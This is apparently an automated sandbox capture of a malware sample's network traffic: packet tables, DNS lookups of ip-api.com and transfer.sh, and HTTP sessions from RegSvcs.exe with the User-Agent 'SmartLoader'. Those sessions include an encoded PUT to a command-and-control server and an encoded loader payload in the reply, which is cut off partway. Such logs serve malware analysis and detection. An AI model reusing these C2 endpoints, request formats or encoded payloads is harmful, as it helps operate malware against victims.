Mar 24, 2023 15:28:23.604201078 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.604222059 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.604276896 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.604803085 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.604834080 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.604918003 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.604933023 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.604954958 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.605001926 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.605312109 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.605339050 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.605408907 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.605421066 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.605515003 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.605853081 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.605931044 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.608907938 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.608928919 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.609035969 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.625148058 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.625190020 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.625257015 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.625272989 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.625287056 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.625334978 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.625596046 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.625626087 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.625714064 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.625729084 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.625787973 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.628789902 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.628828049 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.628909111 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.628926992 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.628962040 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.628974915 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.628993034 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.629012108 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.629031897 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.629081011 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.629357100 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.629389048 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.629503965 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.629520893 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.629569054 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.630105972 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.630155087 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.630194902 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.630208015 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.630239010 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.630315065 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.630518913 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.630553961 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.630604029 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.630645037 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.630654097 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.630705118 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.648977995 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.649032116 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.649101019 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.649121046 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.649149895 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.649172068 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.649544954 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.649580956 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.649640083 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.649657965 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.649674892 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.649701118 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.652724981 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.652770996 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.652843952 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.652859926 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.652893066 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.652909994 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.653076887 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.653111935 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.653156042 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.653167009 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.653203011 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.653584957 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.654143095 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654182911 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654337883 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.654350996 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654422998 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654458046 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654465914 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.654474974 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654548883 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.654548883 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.654855013 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.654906988 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.655070066 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.655086994 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.655150890 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.673602104 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.673649073 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.673749924 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.673773050 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.673823118 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.673979044 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.674052000 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:23.878741026 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:23.878830910 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.298790932 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.298976898 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.302748919 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.302804947 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.302836895 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.302915096 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.302966118 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.514724970 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.514969110 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.568422079 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.568461895 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568509102 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568645954 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.568665028 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568686008 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568825006 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.568836927 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568855047 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568876028 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.568936110 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.568948984 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.569021940 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.569039106 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.569083929 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.569097996 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.569108009 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.569135904 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.569339991 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.569483995 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.774723053 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.774876118 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:24.986725092 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:24.986814976 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.422717094 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.422836065 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.559281111 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.559314966 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.559335947 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.559406996 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.559458017 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.642982006 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643007040 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643028021 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643038988 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643105984 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643114090 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643198013 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643208027 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643223047 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643260002 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643299103 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643299103 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643311977 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643326044 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643332005 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643392086 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643400908 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643414021 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643457890 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643469095 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643548012 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643629074 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.643639088 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.643711090 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:25.854717970 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:25.854794025 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:26.286710978 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:26.286771059 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:26.873759985 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:26.873810053 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:26.873837948 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:26.873930931 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:26.873989105 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.078721046 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.078808069 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.136894941 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.136912107 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.136930943 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.136997938 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137003899 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137047052 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137052059 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137063026 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137070894 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137077093 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137090921 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137104034 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137109041 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137147903 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137154102 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137209892 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137226105 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:28:27.137260914 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:27.137309074 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:35.623686075 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:35.821547985 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:39.110536098 CET	49706	443	192.168.2.3	144.76.136.153
Mar 24, 2023 15:28:39.110580921 CET	443	49706	144.76.136.153	192.168.2.3
Mar 24, 2023 15:29:18.560554981 CET	80	49702	208.95.112.1	192.168.2.3
Mar 24, 2023 15:29:27.015007973 CET	80	49703	84.252.73.140	192.168.2.3
Mar 24, 2023 15:29:27.015119076 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:29:27.213241100 CET	80	49705	144.76.136.153	192.168.2.3
Mar 24, 2023 15:29:27.213329077 CET	49705	80	192.168.2.3	144.76.136.153
Mar 24, 2023 15:30:11.164805889 CET	49705	80	192.168.2.3	144.76.136.153
Mar 24, 2023 15:30:11.165023088 CET	49703	80	192.168.2.3	84.252.73.140
Mar 24, 2023 15:30:11.189325094 CET	80	49705	144.76.136.153	192.168.2.3
Mar 24, 2023 15:30:11.226732969 CET	80	49703	84.252.73.140	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2023 15:28:21.390486002 CET	57990	53	192.168.2.3	8.8.8.8
Mar 24, 2023 15:28:21.421521902 CET	53	57990	8.8.8.8	192.168.2.3
Mar 24, 2023 15:28:22.101310015 CET	52387	53	192.168.2.3	8.8.8.8
Mar 24, 2023 15:28:22.122858047 CET	53	52387	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 24, 2023 15:28:21.390486002 CET	192.168.2.3	8.8.8.8	0x909b	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Mar 24, 2023 15:28:22.101310015 CET	192.168.2.3	8.8.8.8	0xe2ca	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 24, 2023 15:28:21.421521902 CET	8.8.8.8	192.168.2.3	0x909b	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Mar 24, 2023 15:28:22.122858047 CET	8.8.8.8	192.168.2.3	0xe2ca	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.sh

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	53341	144.76.136.153	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49702	208.95.112.1	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Mar 24, 2023 15:28:21.500741005 CET	145	OUT	GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1 Content-Type: application/json User-Agent: SmartLoader Host: ip-api.com
Mar 24, 2023 15:28:21.534492970 CET	145	IN	HTTP/1.1 200 OK Date: Fri, 24 Mar 2023 14:28:21 GMT Content-Type: application/json; charset=utf-8 Content-Length: 104 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 34 30 22 7d Data Ascii: {"status":"success","countryCode":"CH","city":"Zurich","timezone":"Europe/Zurich","query":"84.17.52.40"}
Mar 24, 2023 15:28:22.543525934 CET	165	IN	HTTP/1.1 200 OK Date: Fri, 24 Mar 2023 14:28:21 GMT Content-Type: application/json; charset=utf-8 Content-Length: 104 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 34 30 22 7d Data Ascii: {"status":"success","countryCode":"CH","city":"Zurich","timezone":"Europe/Zurich","query":"84.17.52.40"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49703	84.252.73.140	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Mar 24, 2023 15:28:21.701108932 CET	148	OUT	PUT /loader/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys HTTP/1.1 Content-Type: application/json User-Agent: SmartLoader Host: 84.252.73.140 Content-Length: 575 Cache-Control: no-cache Data Raw: 7b 22 64 61 74 61 22 3a 22 59 6a 4d 73 59 7a 59 73 59 7a 4d 73 59 32 49 73 5a 44 45 73 59 57 45 73 4f 57 4d 73 59 6d 49 73 59 6a 55 73 59 57 49 73 4f 44 55 73 4f 44 67 73 4e 6d 55 73 4f 54 51 73 59 7a 6b 73 59 57 45 73 59 6a 63 73 59 6a 59 73 59 54 6b 73 4f 54 6b 73 4e 6d 4d 73 59 6d 45 73 59 57 49 73 4e 6a 4d 73 4f 44 4d 73 4f 44 55 73 59 54 6b 73 4f 54 45 73 4f 47 51 73 4e 6a 59 73 59 54 49 73 4e 32 4d 73 4f 44 41 73 4f 54 67 73 4f 57 49 73 4f 57 4d 73 59 54 45 73 4e 32 49 73 4f 44 63 73 4f 47 59 73 59 6a 45 73 59 6a 41 73 4f 57 49 73 4f 47 4d 73 4f 47 55 73 4e 6a 49 73 4f 47 49 73 4f 44 4d 73 4f 47 4d 73 59 6d 45 73 4f 47 49 73 59 32 4d 73 59 54 55 73 5a 54 49 73 5a 44 63 73 59 54 49 73 59 7a 51 73 59 6a 55 73 5a 54 55 73 4f 54 59 73 4e 32 45 73 4e 6a 41 73 4f 57 59 73 4e 6d 45 73 4e 32 59 73 4f 54 41 73 4f 44 67 73 5a 47 4d 73 5a 47 59 73 4f 57 51 73 59 7a 55 73 4f 54 51 73 5a 54 41 73 5a 44 67 73 59 7a 63 73 59 6d 49 73 59 7a 49 73 4e 54 4d 73 59 7a 55 73 59 6a 59 73 59 6a 67 73 5a 57 49 73 5a 47 55 73 59 54 59 73 4e 6d 55 73 59 54 6b 73 4f 54 55 73 4e 57 55 73 4f 44 63 73 4e 32 55 73 59 54 67 73 4f 47 49 73 4e 7a 55 73 4e 6a 51 73 4f 57 55 73 4e 57 51 73 59 57 45 73 59 7a 59 73 5a 44 63 73 5a 44 55 73 5a 54 41 73 59 57 45 73 59 32 4d 73 4f 54 51 73 59 6d 49 73 59 6d 59 73 4e 32 49 73 59 6d 45 73 59 6a 45 73 59 54 45 73 59 32 51 73 4e 32 55 73 59 57 51 73 5a 57 55 73 5a 44 63 73 5a 44 49 73 4f 54 6b 73 5a 47 51 73 4f 47 51 73 59 54 45 73 59 6a 6b 73 59 6d 51 73 5a 44 67 73 5a 44 4d 73 59 6a 59 73 4f 57 55 73 5a 44 4d 73 4e 7a 51 73 4f 47 4d 73 59 32 4d 73 5a 44 51 73 5a 44 59 73 5a 47 4d 73 4f 57 51 73 4f 44 49 73 59 6a 45 73 5a 57 51 73 5a 54 6b 73 59 6d 55 73 59 6d 45 73 59 6a 41 3d 22 7d Data Ascii: {"data":"YjMsYzYsYzMsY2IsZDEsYWEsOWMsYmIsYjUsYWIsODUsODgsNmUsOTQsYzksYWEsYjcsYjYsYTksOTksNmMsYmEsYWIsNjMsODMsODUsYTksOTEsOGQsNjYsYTIsN2MsODAsOTgsOWIsOWMsYTEsN2IsODcsOGYsYjEsYjAsOWIsOGMsOGUsNjIsOGIsODMsOGMsYmEsOGIsY2MsYTUsZTIsZDcsYTIsYzQsYjUsZTUsOTYsN2EsNjAsOWYsNmEsN2YsOTAsODgsZGMsZGYsOWQsYzUsOTQsZTAsZDgsYzcsYmIsYzIsNTMsYzUsYjYsYjgsZWIsZGUsYTYsNmUsYTksOTUsNWUsODcsN2UsYTgsOGIsNzUsNjQsOWUsNWQsYWEsYzYsZDcsZDUsZTAsYWEsY2MsOTQsYmIsYmYsN2IsYmEsYjEsYTEsY2QsN2UsYWQsZWUsZDcsZDIsOTksZGQsOGQsYTEsYjksYmQsZDgsZDMsYjYsOWUsZDMsNzQsOGMsY2MsZDQsZDYsZGMsOWQsODIsYjEsZWQsZTksYmUsYmEsYjA="}
Mar 24, 2023 15:28:22.013144970 CET	159	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 24 Mar 2023 14:28:21 GMT Content-Type: application/json Content-Length: 1372 Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3OAcxMn%2BA6o3dqo%2FPkc8M99SRSUb8yUBFla3un2AgjoH%2BoIK5d8zxz0M%2BCv6zKz7GKpc1oaeuE9eubgIVh0FEKdBseEfyziXy3meFrcIo3UN28TMR%2BWKl5sfsumC8W%2BFbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 7acf99a42b84b761-AMS alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 7a 49 73 4e 7a 6b 73 59 7a 51 73 5a 54 41 73 5a 47 4d 73 4f 54 6b 73 59 7a 59 73 59 32 45 73 5a 44 63 73 5a 47 49 73 59 6d 45 73 59 6d 51 73 59 57 51 73 4f 57 49 73 59 6a 67 73 59 54 59 73 59 7a 55 73 4f 57 49 73 4f 57 59 73 4f 44 6b 73 4e 6a 63 73 59 54 45 73 4f 44 63 73 4e 47 59 73 59 6a 45 73 59 7a 55 73 5a 54 63 73 59 7a 67 73 59 6a 6b 73 59 54 55 73 5a 47 4d 73 4e 54 6b 73 4f 44 45 73 4e 7a 63 73 4f 54 4d 73 4f 54 4d 73 4f 47 4d 73 4e 57 45 73 59 7a 55 73 59 6d 4d 73 5a 54 51 73 5a 44 67 73 59 32 45 73 59 7a 55 73 59 57 49 73 4f 54 55 73 4e 7a 59 73 4e 32 49 73 4e 7a 4d 73 5a 6a 51 73 4f 44 63 73 5a 47 51 73 4f 57 59 73 5a 54 49 73 59 32 4d 73 4e 47 59 73 4f 47 45 73 4e 7a 41 73 59 54 41 73 4f 47 45 73 4e 7a 4d 73 4e 54 41 73 4f 54 41 73 59 57 45 73 59 6d 49 73 59 6a 67 73 5a 44 59 73 5a 47 4d 73 5a 47 59 73 4e 57 45 73 4f 47 51 73 4e 7a 63 73 5a 47 55 73 5a 44 67 73 59 7a 45 73 59 32 45 73 59 57 51 73 59 57 45 73 4f 44 41 73 4e 6a 45 73 4e 7a 55 73 5a 57 51 73 59 7a 59 73 59 32 49 73 59 54 49 73 5a 47 45 73 5a 47 49 73 4e 47 59 73 4f 47 45 73 4e 7a 41 73 5a 57 55 73 4e 32 49 73 59 6d 49 73 4f 54 55 73 5a 54 59 73 59 57 49 73 4e 6a 6b 73 4f 54 45 73 4f 44 49 73 4f 44 6b 73 59 57 51 73 59 54 59 73 4e 7a 4d 73 59 6d 4d 73 5a 57 45 73 5a 54 6b 73 59 7a 51 73 59 7a 6b 73 4e 6a 67 73 4f 57 4d 73 59 6a 63 73 59 54 51 73 59 7a 67 73 5a 57 49 73 5a 44 63 73 59 32 55 73 4f 57 45 73 4f 54 63 73 4f 54 4d 73 4e 47 51 73 4e 7a 49 73 59 7a 4d 73 5a 54 63 73 59 6d 45 73 59 6d 49 73 59 54 55 73 5a 54 45 73 4e 54 6b 73 4f 44 45 73 4e 7a 63 73 59 7a 67 73 59 7a 67 73 5a 44 67 73 59 57 49 73 59 6a 67 